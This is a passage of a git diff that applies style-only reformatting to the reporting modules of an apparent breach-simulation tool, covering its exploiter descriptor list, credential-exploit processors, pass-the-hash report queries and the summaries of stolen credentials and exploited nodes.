monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import \ - ZerologonExploitProcessor +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import ( + CredExploitProcessor, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploitProcessor, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import ( + ShellShockExploitProcessor, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import ( + ZerologonExploitProcessor, +) @dataclass @@ -20,23 +25,35 @@ class ExploiterDescriptor: class ExploiterDescriptorEnum(Enum): - SMB = ExploiterDescriptor('SmbExploiter', 'SMB Exploiter', CredExploitProcessor) - WMI = ExploiterDescriptor('WmiExploiter', 'WMI Exploiter', CredExploitProcessor) - SSH = ExploiterDescriptor('SSHExploiter', 'SSH Exploiter', CredExploitProcessor) - SAMBACRY = ExploiterDescriptor('SambaCryExploiter', 'SambaCry Exploiter', CredExploitProcessor) - ELASTIC = ExploiterDescriptor('ElasticGroovyExploiter', 'Elastic Groovy Exploiter', ExploitProcessor) - MS08_067 = ExploiterDescriptor('Ms08_067_Exploiter', 'Conficker Exploiter', ExploitProcessor) - SHELLSHOCK = ExploiterDescriptor('ShellShockExploiter', 'ShellShock Exploiter', ShellShockExploitProcessor) - STRUTS2 = ExploiterDescriptor('Struts2Exploiter', 'Struts2 Exploiter', ExploitProcessor) - WEBLOGIC = ExploiterDescriptor('WebLogicExploiter', 'Oracle WebLogic Exploiter', ExploitProcessor) - HADOOP = ExploiterDescriptor('HadoopExploiter', 'Hadoop/Yarn Exploiter', ExploitProcessor) - MSSQL = ExploiterDescriptor('MSSQLExploiter', 'MSSQL Exploiter', ExploitProcessor) - VSFTPD = ExploiterDescriptor('VSFTPDExploiter', 'VSFTPD Backdoor Exploiter', CredExploitProcessor) - DRUPAL = ExploiterDescriptor('DrupalExploiter', 'Drupal Server Exploiter', ExploitProcessor) - ZEROLOGON = ExploiterDescriptor('ZerologonExploiter', 'Zerologon Exploiter', ZerologonExploitProcessor) + SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor) + WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor) + SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor) + SAMBACRY = ExploiterDescriptor("SambaCryExploiter", "SambaCry Exploiter", CredExploitProcessor) + ELASTIC = ExploiterDescriptor( + "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor + ) + MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor) + SHELLSHOCK = ExploiterDescriptor( + "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor + ) + STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor) + WEBLOGIC = ExploiterDescriptor( + "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor + ) + HADOOP = ExploiterDescriptor("HadoopExploiter", "Hadoop/Yarn Exploiter", ExploitProcessor) + MSSQL = ExploiterDescriptor("MSSQLExploiter", "MSSQL Exploiter", ExploitProcessor) + VSFTPD = ExploiterDescriptor( + "VSFTPDExploiter", "VSFTPD Backdoor Exploiter", CredExploitProcessor + ) + DRUPAL = ExploiterDescriptor("DrupalExploiter", "Drupal Server Exploiter", ExploitProcessor) + ZEROLOGON = ExploiterDescriptor( + "ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor + ) @staticmethod def get_by_class_name(class_name: str) -> ExploiterDescriptor: - return [descriptor.value - for descriptor in ExploiterDescriptorEnum - if descriptor.value.class_name == class_name][0] + return [ + descriptor.value + for descriptor in ExploiterDescriptorEnum + if descriptor.value.class_name == class_name + ][0] diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py index 3e1cb0601..c7a4bd1d0 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py @@ -4,9 +4,9 @@ from typing import Union, List class CredentialType(Enum): - PASSWORD = 'password' - HASH = 'hash' - KEY = 'key' + PASSWORD = "password" + HASH = "hash" + KEY = "key" @dataclass diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py index 43156561c..7ccce8e00 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py @@ -1,23 +1,26 @@ -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import \ - ExploiterReportInfo, CredentialType -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ExploitProcessor +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import ( + ExploiterReportInfo, + CredentialType, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploitProcessor, +) class CredExploitProcessor: - @staticmethod def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict) - for attempt in exploit_dict['data']['attempts']: - if attempt['result']: - exploit_info.username = attempt['user'] - if attempt['password']: + for attempt in exploit_dict["data"]["attempts"]: + if attempt["result"]: + exploit_info.username = attempt["user"] + if attempt["password"]: exploit_info.credential_type = CredentialType.PASSWORD.value - exploit_info.password = attempt['password'] - elif attempt['ssh_key']: + exploit_info.password = attempt["password"] + elif attempt["ssh_key"]: exploit_info.credential_type = CredentialType.KEY.value - exploit_info.ssh_key = attempt['ssh_key'] + exploit_info.ssh_key = attempt["ssh_key"] else: exploit_info.credential_type = CredentialType.HASH.value return exploit_info diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py index c541ba252..1b29fc773 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py @@ -1,12 +1,12 @@ from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import \ - ExploiterReportInfo +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import ( + ExploiterReportInfo, +) class ExploitProcessor: - @staticmethod def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: - ip_addr = exploit_dict['data']['machine']['ip_addr'] + ip_addr = exploit_dict["data"]["machine"]["ip_addr"] machine = NodeService.get_node_hostname(NodeService.get_node_or_monkey_by_ip(ip_addr)) return ExploiterReportInfo(ip_address=ip_addr, machine=machine, type=class_name) diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py index d33bd8615..cd627eb5c 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py @@ -1,14 +1,15 @@ -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import \ - ExploiterReportInfo, ExploitProcessor +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploiterReportInfo, + ExploitProcessor, +) class ShellShockExploitProcessor: - @staticmethod def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict) - urls = exploit_dict['data']['info']['vulnerable_urls'] - exploit_info.port = urls[0].split(':')[2].split('/')[0] - exploit_info.paths = ['/' + url.split(':')[2].split('/')[1] for url in urls] + urls = exploit_dict["data"]["info"]["vulnerable_urls"] + exploit_info.port = urls[0].split(":")[2].split("/")[0] + exploit_info.paths = ["/" + url.split(":")[2].split("/")[1] for url in urls] return exploit_info diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py index e0be6cd42..09bbce0d6 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py @@ -1,11 +1,12 @@ -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ExploitProcessor, \ - ExploiterReportInfo +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploitProcessor, + ExploiterReportInfo, +) class ZerologonExploitProcessor: - @staticmethod def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict) - exploit_info.password_restored = exploit_dict['data']['info']['password_restored'] + exploit_info.password_restored = exploit_dict["data"]["info"]["password_restored"] return exploit_info diff --git a/monkey/monkey_island/cc/services/reporting/pth_report.py b/monkey/monkey_island/cc/services/reporting/pth_report.py index 2389b12da..99c5a7467 100644 --- a/monkey/monkey_island/cc/services/reporting/pth_report.py +++ b/monkey/monkey_island/cc/services/reporting/pth_report.py @@ -7,7 +7,7 @@ from monkey_island.cc.models import Monkey from monkey_island.cc.services.groups_and_users_consts import USERTYPE from monkey_island.cc.services.node import NodeService -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" class PTHReportService(object): @@ -31,19 +31,22 @@ class PTHReportService(object): """ pipeline = [ - {"$match": { - 'NTLM_secret': { - "$exists": "true", "$ne": None} - }}, + {"$match": {"NTLM_secret": {"$exists": "true", "$ne": None}}}, { "$group": { - "_id": { - "NTLM_secret": "$NTLM_secret"}, + "_id": {"NTLM_secret": "$NTLM_secret"}, "count": {"$sum": 1}, - "Docs": {"$push": {'_id': "$_id", 'name': '$name', 'domain_name': '$domain_name', - 'machine_id': '$machine_id'}} - }}, - {'$match': {'count': {'$gt': 1}}} + "Docs": { + "$push": { + "_id": "$_id", + "name": "$name", + "domain_name": "$domain_name", + "machine_id": "$machine_id", + } + }, + } + }, + {"$match": {"count": {"$gt": 1}}}, ] return mongo.db.groupsandusers.aggregate(pipeline) @@ -56,8 +59,8 @@ class PTHReportService(object): :return: A list of formatted machines names *domain*/*hostname*, to use in shared admins issues. """ - machines = mongo.db.monkey.find({'_id': {'$in': admin_on_machines}}, {'hostname': 1}) - return [domain_name + '\\' + i['hostname'] for i in list(machines)] + machines = mongo.db.monkey.find({"_id": {"$in": admin_on_machines}}, {"hostname": 1}) + return [domain_name + "\\" + i["hostname"] for i in list(machines)] @staticmethod def __strong_users_on_crit_query(): @@ -69,33 +72,28 @@ class PTHReportService(object): A list of said users """ pipeline = [ + {"$unwind": "$admin_on_machines"}, + {"$match": {"type": USERTYPE, "domain_name": {"$ne": None}}}, { - '$unwind': '$admin_on_machines' + "$lookup": { + "from": "monkey", + "localField": "admin_on_machines", + "foreignField": "_id", + "as": "critical_machine", + } }, - { - '$match': {'type': USERTYPE, 'domain_name': {'$ne': None}} - }, - { - '$lookup': - { - 'from': 'monkey', - 'localField': 'admin_on_machines', - 'foreignField': '_id', - 'as': 'critical_machine' - } - }, - { - '$match': {'critical_machine.critical_services': {'$ne': []}} - }, - { - '$unwind': '$critical_machine' - } + {"$match": {"critical_machine.critical_services": {"$ne": []}}}, + {"$unwind": "$critical_machine"}, ] return mongo.db.groupsandusers.aggregate(pipeline) @staticmethod def __build_dup_user_label(i): - return i['hostname'] + '\\' + i['username'] if i['hostname'] else i['domain_name'] + '\\' + i['username'] + return ( + i["hostname"] + "\\" + i["username"] + if i["hostname"] + else i["domain_name"] + "\\" + i["username"] + ) @staticmethod def get_duplicated_passwords_nodes(): @@ -104,13 +102,15 @@ class PTHReportService(object): for doc in docs: users_list = [ { - 'username': user['name'], - 'domain_name': user['domain_name'], - 'hostname': NodeService.get_hostname_by_id(ObjectId(user['machine_id'])) if - user['machine_id'] else None - } for user in doc['Docs'] + "username": user["name"], + "domain_name": user["domain_name"], + "hostname": NodeService.get_hostname_by_id(ObjectId(user["machine_id"])) + if user["machine_id"] + else None, + } + for user in doc["Docs"] ] - users_cred_groups.append({'cred_groups': users_list}) + users_cred_groups.append({"cred_groups": users_list}) return users_cred_groups @@ -119,13 +119,19 @@ class PTHReportService(object): user_groups = PTHReportService.get_duplicated_passwords_nodes() issues = [] for group in user_groups: - user_info = group['cred_groups'][0] + user_info = group["cred_groups"][0] issues.append( { - 'type': 'shared_passwords_domain' if user_info['domain_name'] else 'shared_passwords', - 'machine': user_info['hostname'] if user_info['hostname'] else user_info['domain_name'], - 'shared_with': [PTHReportService.__build_dup_user_label(i) for i in group['cred_groups']], - 'is_local': False if user_info['domain_name'] else True + "type": "shared_passwords_domain" + if user_info["domain_name"] + else "shared_passwords", + "machine": user_info["hostname"] + if user_info["hostname"] + else user_info["domain_name"], + "shared_with": [ + PTHReportService.__build_dup_user_label(i) for i in group["cred_groups"] + ], + "is_local": False if user_info["domain_name"] else True, } ) return issues @@ -137,16 +143,23 @@ class PTHReportService(object): # object has at least two objects in it, by making sure any value exists in the array index 1. # Excluding the name Administrator - its spamming the lists and not a surprise the domain Administrator account # is shared. - admins = mongo.db.groupsandusers.find({'type': USERTYPE, 'name': {'$ne': 'Administrator'}, - 'admin_on_machines.1': {'$exists': True}}, - {'admin_on_machines': 1, 'name': 1, 'domain_name': 1}) + admins = mongo.db.groupsandusers.find( + { + "type": USERTYPE, + "name": {"$ne": "Administrator"}, + "admin_on_machines.1": {"$exists": True}, + }, + {"admin_on_machines": 1, "name": 1, "domain_name": 1}, + ) return [ { - 'name': admin['name'], - 'domain_name': admin['domain_name'], - 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], - admin['domain_name']) - } for admin in admins + "name": admin["name"], + "domain_name": admin["domain_name"], + "admin_on_machines": PTHReportService.__get_admin_on_machines_format( + admin["admin_on_machines"], admin["domain_name"] + ), + } + for admin in admins ] @staticmethod @@ -154,13 +167,14 @@ class PTHReportService(object): admins_info = PTHReportService.get_shared_admins_nodes() return [ { - 'is_local': False, - 'type': 'shared_admins_domain', - 'machine': admin['domain_name'], - 'username': admin['domain_name'] + '\\' + admin['name'], - 'shared_machines': admin['admin_on_machines'], + "is_local": False, + "type": "shared_admins_domain", + "machine": admin["domain_name"], + "username": admin["domain_name"] + "\\" + admin["name"], + "shared_machines": admin["admin_on_machines"], } - for admin in admins_info] + for admin in admins_info + ] @staticmethod def get_strong_users_on_critical_machines_nodes(): @@ -169,15 +183,18 @@ class PTHReportService(object): docs = PTHReportService.__strong_users_on_crit_query() for doc in docs: - hostname = str(doc['critical_machine']['hostname']) + hostname = str(doc["critical_machine"]["hostname"]) if hostname not in crit_machines: crit_machines[hostname] = { - 'threatening_users': [], - 'critical_services': doc['critical_machine']['critical_services'] + "threatening_users": [], + "critical_services": doc["critical_machine"]["critical_services"], } - crit_machines[hostname]['threatening_users'].append( - {'name': str(doc['domain_name']) + '\\' + str(doc['name']), - 'creds_location': doc['secret_location']}) + crit_machines[hostname]["threatening_users"].append( + { + "name": str(doc["domain_name"]) + "\\" + str(doc["name"]), + "creds_location": doc["secret_location"], + } + ) return crit_machines @staticmethod @@ -186,11 +203,14 @@ class PTHReportService(object): return [ { - 'type': 'strong_users_on_crit', - 'machine': machine, - 'services': crit_machines[machine].get('critical_services'), - 'threatening_users': [i['name'] for i in crit_machines[machine]['threatening_users']] - } for machine in crit_machines + "type": "strong_users_on_crit", + "machine": machine, + "services": crit_machines[machine].get("critical_services"), + "threatening_users": [ + i["name"] for i in crit_machines[machine]["threatening_users"] + ], + } + for machine in crit_machines ] @staticmethod @@ -198,22 +218,20 @@ class PTHReportService(object): user_details = {} crit_machines = PTHReportService.get_strong_users_on_critical_machines_nodes() for machine in crit_machines: - for user in crit_machines[machine]['threatening_users']: - username = user['name'] + for user in crit_machines[machine]["threatening_users"]: + username = user["name"] if username not in user_details: - user_details[username] = { - 'machines': [], - 'services': [] - } - user_details[username]['machines'].append(machine) - user_details[username]['services'] += crit_machines[machine]['critical_services'] + user_details[username] = {"machines": [], "services": []} + user_details[username]["machines"].append(machine) + user_details[username]["services"] += crit_machines[machine]["critical_services"] return [ { - 'username': user, - 'machines': user_details[user]['machines'], - 'services_names': user_details[user]['services'] - } for user in user_details + "username": user, + "machines": user_details[user]["machines"], + "services_names": user_details[user]["services"], + } + for user in user_details ] @staticmethod @@ -222,12 +240,13 @@ class PTHReportService(object): return [ { - 'id': monkey.guid, - 'label': '{0} : {1}'.format(monkey.hostname, monkey.ip_addresses[0]), - 'group': 'critical' if monkey.critical_services is not None else 'normal', - 'services': monkey.critical_services, - 'hostname': monkey.hostname - } for monkey in monkeys + "id": monkey.guid, + "label": "{0} : {1}".format(monkey.hostname, monkey.ip_addresses[0]), + "group": "critical" if monkey.critical_services is not None else "normal", + "services": monkey.critical_services, + "hostname": monkey.hostname, + } + for monkey in monkeys ] @staticmethod @@ -235,52 +254,38 @@ class PTHReportService(object): edges_list = [] comp_users = mongo.db.groupsandusers.find( - { - 'admin_on_machines': {'$ne': []}, - 'secret_location': {'$ne': []}, - 'type': USERTYPE - }, - { - 'admin_on_machines': 1, 'secret_location': 1 - } + {"admin_on_machines": {"$ne": []}, "secret_location": {"$ne": []}, "type": USERTYPE}, + {"admin_on_machines": 1, "secret_location": 1}, ) for user in comp_users: # A list comp, to get all unique pairs of attackers and victims. - for pair in [pair for pair in product(user['admin_on_machines'], user['secret_location']) - if pair[0] != pair[1]]: + for pair in [ + pair + for pair in product(user["admin_on_machines"], user["secret_location"]) + if pair[0] != pair[1] + ]: edges_list.append( - { - 'from': pair[1], - 'to': pair[0], - 'id': str(pair[1]) + str(pair[0]) - } + {"from": pair[1], "to": pair[0], "id": str(pair[1]) + str(pair[0])} ) return edges_list @staticmethod def get_pth_map(): return { - 'nodes': PTHReportService.generate_map_nodes(), - 'edges': PTHReportService.generate_edges() + "nodes": PTHReportService.generate_map_nodes(), + "edges": PTHReportService.generate_edges(), } @staticmethod def get_report(): pth_map = PTHReportService.get_pth_map() PTHReportService.get_strong_users_on_critical_machines_nodes() - report = \ - { - 'report_info': - { - 'strong_users_table': PTHReportService.get_strong_users_on_crit_details() - }, - - 'pthmap': - { - 'nodes': pth_map.get('nodes'), - 'edges': pth_map.get('edges') - } - } + report = { + "report_info": { + "strong_users_table": PTHReportService.get_strong_users_on_crit_details() + }, + "pthmap": {"nodes": pth_map.get("nodes"), "edges": pth_map.get("edges")}, + } return report diff --git a/monkey/monkey_island/cc/services/reporting/report.py b/monkey/monkey_island/cc/services/reporting/report.py index 6430a2559..5bbb64f39 100644 --- a/monkey/monkey_island/cc/services/reporting/report.py +++ b/monkey/monkey_island/cc/services/reporting/report.py @@ -12,19 +12,31 @@ from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.utils.network_utils import get_subnets, local_ip_addresses from monkey_island.cc.services.config import ConfigService -from common.config_value_paths import (EXPLOITER_CLASSES_PATH, LOCAL_NETWORK_SCAN_PATH, - PASSWORD_LIST_PATH, SUBNET_SCAN_LIST_PATH, - USER_LIST_PATH) -from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups +from common.config_value_paths import ( + EXPLOITER_CLASSES_PATH, + LOCAL_NETWORK_SCAN_PATH, + PASSWORD_LIST_PATH, + SUBNET_SCAN_LIST_PATH, + USER_LIST_PATH, +) +from monkey_island.cc.services.configuration.utils import ( + get_config_network_segments_as_subnet_groups, +) from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_descriptor_enum import ExploiterDescriptorEnum -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import \ - CredentialType -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import \ - ExploiterReportInfo +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_descriptor_enum import ( + ExploiterDescriptorEnum, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import ( + CredentialType, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploiterReportInfo, +) from monkey_island.cc.services.reporting.pth_report import PTHReportService from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager -from monkey_island.cc.services.reporting.report_generation_synchronisation import safe_generate_regular_report +from monkey_island.cc.services.reporting.report_generation_synchronisation import ( + safe_generate_regular_report, +) __author__ = "itay.mizeretz" @@ -32,7 +44,6 @@ logger = logging.getLogger(__name__) class ReportService: - class DerivedIssueEnum: WEAK_PASSWORD = "weak_password" STOLEN_CREDS = "stolen_creds" @@ -40,11 +51,19 @@ class ReportService: @staticmethod def get_first_monkey_time(): - return mongo.db.telemetry.find({}, {'timestamp': 1}).sort([('$natural', 1)]).limit(1)[0]['timestamp'] + return ( + mongo.db.telemetry.find({}, {"timestamp": 1}) + .sort([("$natural", 1)]) + .limit(1)[0]["timestamp"] + ) @staticmethod def get_last_monkey_dead_time(): - return mongo.db.telemetry.find({}, {'timestamp': 1}).sort([('$natural', -1)]).limit(1)[0]['timestamp'] + return ( + mongo.db.telemetry.find({}, {"timestamp": 1}) + .sort([("$natural", -1)]) + .limit(1)[0]["timestamp"] + ) @staticmethod def get_monkey_duration(): @@ -65,26 +84,34 @@ class ReportService: def get_tunnels(): return [ { - 'type': 'tunnel', - 'machine': NodeService.get_node_hostname(NodeService.get_node_or_monkey_by_id(tunnel['_id'])), - 'dest': NodeService.get_node_hostname(NodeService.get_node_or_monkey_by_id(tunnel['tunnel'])) + "type": "tunnel", + "machine": NodeService.get_node_hostname( + NodeService.get_node_or_monkey_by_id(tunnel["_id"]) + ), + "dest": NodeService.get_node_hostname( + NodeService.get_node_or_monkey_by_id(tunnel["tunnel"]) + ), } - for tunnel in mongo.db.monkey.find({'tunnel': {'$exists': True}}, {'tunnel': 1})] + for tunnel in mongo.db.monkey.find({"tunnel": {"$exists": True}}, {"tunnel": 1}) + ] @staticmethod def get_azure_issues(): creds = ReportService.get_azure_creds() - machines = set([instance['origin'] for instance in creds]) + machines = set([instance["origin"] for instance in creds]) - logger.info('Azure issues generated for reporting') + logger.info("Azure issues generated for reporting") return [ { - 'type': 'azure_password', - 'machine': machine, - 'users': set([instance['username'] for instance in creds if instance['origin'] == machine]) + "type": "azure_password", + "machine": machine, + "users": set( + [instance["username"] for instance in creds if instance["origin"] == machine] + ), } - for machine in machines] + for machine in machines + ] @staticmethod def get_scanned(): @@ -93,60 +120,75 @@ class ReportService: nodes = ReportService.get_all_displayed_nodes() for node in nodes: - nodes_that_can_access_current_node = node['accessible_from_nodes_hostnames'] + nodes_that_can_access_current_node = node["accessible_from_nodes_hostnames"] formatted_nodes.append( { - 'label': node['label'], - 'ip_addresses': node['ip_addresses'], - 'accessible_from_nodes': nodes_that_can_access_current_node, - 'services': node['services'], - 'domain_name': node['domain_name'], - 'pba_results': node['pba_results'] if 'pba_results' in node else 'None' - }) + "label": node["label"], + "ip_addresses": node["ip_addresses"], + "accessible_from_nodes": nodes_that_can_access_current_node, + "services": node["services"], + "domain_name": node["domain_name"], + "pba_results": node["pba_results"] if "pba_results" in node else "None", + } + ) - logger.info('Scanned nodes generated for reporting') + logger.info("Scanned nodes generated for reporting") return formatted_nodes @staticmethod def get_all_displayed_nodes(): - nodes_without_monkeys = [NodeService.get_displayed_node_by_id(node['_id'], True) for node in - mongo.db.node.find({}, {'_id': 1})] - nodes_with_monkeys = [NodeService.get_displayed_node_by_id(monkey['_id'], True) for monkey in - mongo.db.monkey.find({}, {'_id': 1})] + nodes_without_monkeys = [ + NodeService.get_displayed_node_by_id(node["_id"], True) + for node in mongo.db.node.find({}, {"_id": 1}) + ] + nodes_with_monkeys = [ + NodeService.get_displayed_node_by_id(monkey["_id"], True) + for monkey in mongo.db.monkey.find({}, {"_id": 1}) + ] nodes = nodes_without_monkeys + nodes_with_monkeys return nodes @staticmethod def get_exploited(): - exploited_with_monkeys = \ - [NodeService.get_displayed_node_by_id(monkey['_id'], True) for monkey in - mongo.db.monkey.find({}, {'_id': 1}) if - not NodeService.get_monkey_manual_run(NodeService.get_monkey_by_id(monkey['_id']))] + exploited_with_monkeys = [ + NodeService.get_displayed_node_by_id(monkey["_id"], True) + for monkey in mongo.db.monkey.find({}, {"_id": 1}) + if not NodeService.get_monkey_manual_run(NodeService.get_monkey_by_id(monkey["_id"])) + ] - exploited_without_monkeys = [NodeService.get_displayed_node_by_id(node['_id'], True) for node in - mongo.db.node.find({'exploited': True}, {'_id': 1})] + exploited_without_monkeys = [ + NodeService.get_displayed_node_by_id(node["_id"], True) + for node in mongo.db.node.find({"exploited": True}, {"_id": 1}) + ] exploited = exploited_with_monkeys + exploited_without_monkeys exploited = [ { - 'label': exploited_node['label'], - 'ip_addresses': exploited_node['ip_addresses'], - 'domain_name': exploited_node['domain_name'], - 'exploits': ReportService.get_exploits_used_on_node(exploited_node) + "label": exploited_node["label"], + "ip_addresses": exploited_node["ip_addresses"], + "domain_name": exploited_node["domain_name"], + "exploits": ReportService.get_exploits_used_on_node(exploited_node), } - for exploited_node in exploited] + for exploited_node in exploited + ] - logger.info('Exploited nodes generated for reporting') + logger.info("Exploited nodes generated for reporting") return exploited @staticmethod def get_exploits_used_on_node(node: dict) -> List[str]: - return list(set([ExploiterDescriptorEnum.get_by_class_name(exploit['exploiter']).display_name - for exploit in node['exploits'] - if exploit['result']])) + return list( + set( + [ + ExploiterDescriptorEnum.get_by_class_name(exploit["exploiter"]).display_name + for exploit in node["exploits"] + if exploit["result"] + ] + ) + ) @staticmethod def get_stolen_creds(): @@ -158,27 +200,31 @@ class ReportService: stolen_exploit_creds = ReportService._get_credentials_from_exploit_telems() creds.extend(stolen_exploit_creds) - logger.info('Stolen creds generated for reporting') + logger.info("Stolen creds generated for reporting") return creds @staticmethod def _get_credentials_from_system_info_telems(): formatted_creds = [] - for telem in mongo.db.telemetry.find({'telem_category': 'system_info', 'data.credentials': {'$exists': True}}, - {'data.credentials': 1, 'monkey_guid': 1}): - creds = telem['data']['credentials'] - origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname'] + for telem in mongo.db.telemetry.find( + {"telem_category": "system_info", "data.credentials": {"$exists": True}}, + {"data.credentials": 1, "monkey_guid": 1}, + ): + creds = telem["data"]["credentials"] + origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"] formatted_creds.extend(ReportService._format_creds_for_reporting(telem, creds, origin)) return formatted_creds @staticmethod def _get_credentials_from_exploit_telems(): formatted_creds = [] - for telem in mongo.db.telemetry.find({'telem_category': 'exploit', 'data.info.credentials': {'$exists': True}}, - {'data.info.credentials': 1, 'data.machine': 1, 'monkey_guid': 1}): - creds = telem['data']['info']['credentials'] - domain_name = telem['data']['machine']['domain_name'] - ip = telem['data']['machine']['ip_addr'] + for telem in mongo.db.telemetry.find( + {"telem_category": "exploit", "data.info.credentials": {"$exists": True}}, + {"data.info.credentials": 1, "data.machine": 1, "monkey_guid": 1}, + ): + creds = telem["data"]["info"]["credentials"] + domain_name = telem["data"]["machine"]["domain_name"] + ip = telem["data"]["machine"]["ip_addr"] origin = domain_name if domain_name else ip formatted_creds.extend(ReportService._format_creds_for_reporting(telem, creds, origin)) return formatted_creds @@ -186,7 +232,11 @@ class ReportService: @staticmethod def _format_creds_for_reporting(telem, monkey_creds, origin): creds = [] - CRED_TYPE_DICT = {'password': 'Clear Password', 'lm_hash': 'LM hash', 'ntlm_hash': 'NTLM hash'} + CRED_TYPE_DICT = { + "password": "Clear Password", + "lm_hash": "LM hash", + "ntlm_hash": "NTLM hash", + } if len(monkey_creds) == 0: return [] @@ -194,13 +244,14 @@ class ReportService: for cred_type in CRED_TYPE_DICT: if cred_type not in monkey_creds[user] or not monkey_creds[user][cred_type]: continue - username = monkey_creds[user]['username'] if 'username' in monkey_creds[user] else user - cred_row = \ - { - 'username': username, - 'type': CRED_TYPE_DICT[cred_type], - 'origin': origin - } + username = ( + monkey_creds[user]["username"] if "username" in monkey_creds[user] else user + ) + cred_row = { + "username": username, + "type": CRED_TYPE_DICT[cred_type], + "origin": origin, + } if cred_row not in creds: creds.append(cred_row) return creds @@ -213,17 +264,27 @@ class ReportService: """ creds = [] for telem in mongo.db.telemetry.find( - {'telem_category': 'system_info', 'data.ssh_info': {'$exists': True}}, - {'data.ssh_info': 1, 'monkey_guid': 1} + {"telem_category": "system_info", "data.ssh_info": {"$exists": True}}, + {"data.ssh_info": 1, "monkey_guid": 1}, ): - origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname'] - if telem['data']['ssh_info']: + origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"] + if telem["data"]["ssh_info"]: # Pick out all ssh keys not yet included in creds - ssh_keys = [{'username': key_pair['name'], 'type': 'Clear SSH private key', - 'origin': origin} for key_pair in telem['data']['ssh_info'] - if - key_pair['private_key'] and {'username': key_pair['name'], 'type': 'Clear SSH private key', - 'origin': origin} not in creds] + ssh_keys = [ + { + "username": key_pair["name"], + "type": "Clear SSH private key", + "origin": origin, + } + for key_pair in telem["data"]["ssh_info"] + if 